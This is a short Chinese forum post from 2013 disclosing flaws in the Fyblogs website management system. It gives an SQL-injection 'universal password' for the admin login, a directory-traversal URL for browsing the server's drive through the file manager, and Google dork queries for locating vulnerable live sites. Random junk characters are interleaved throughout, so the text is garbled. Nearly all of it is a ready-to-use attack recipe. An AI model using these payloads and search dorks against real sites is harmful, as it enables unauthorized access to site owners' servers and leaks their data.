漏洞类型: 未授权访问/权限绕过1 P; d* o o2 i5 P# n
A) R! {5 T+ O: ? }- w6 }8 f, X& ]简要描述:$ b1 K$ Y$ z8 o
* b8 _% ^& p6 Z% u/ l- R# L2 k
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!. \5 m0 `( s( O
) L4 L& Q/ ^* }
详细说明:
- O; ?6 g- b9 Q4 |( z g" u/ F! m1 W) @7 Y F2 g# ] a# {! ^; R
后台万能密码 'or'='or'8 ~; j! [/ m; K3 N
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!- M* ]5 n: h8 K3 f7 o. T& C3 B4 ^
admin/uploadfile.asp?currentFolder=/upfiles/../- o9 j# f/ F. I/ |& \# @
( O5 m* J5 B1 l) x( [: l漏洞证明:# F# }7 L% ]" _5 m2 W& N
8 f0 }* r( j8 k; n6 t谷歌:inurl:type.asp?id=1 新闻中心
/ \- s2 @& @9 D1 H5 W或者 :inurl:download_ok.asp?
$ U& s# N7 T$ q; n; i$ w# q: Y# C, [4 P. a. ]" D% v
可以测试2 o6 p. D1 b8 A" R" F) l
7 Y; h0 y; H: L' s3 x
( {1 R, X( O% n |
发表于 2013-3-7 13:07:46
收藏
支持
反对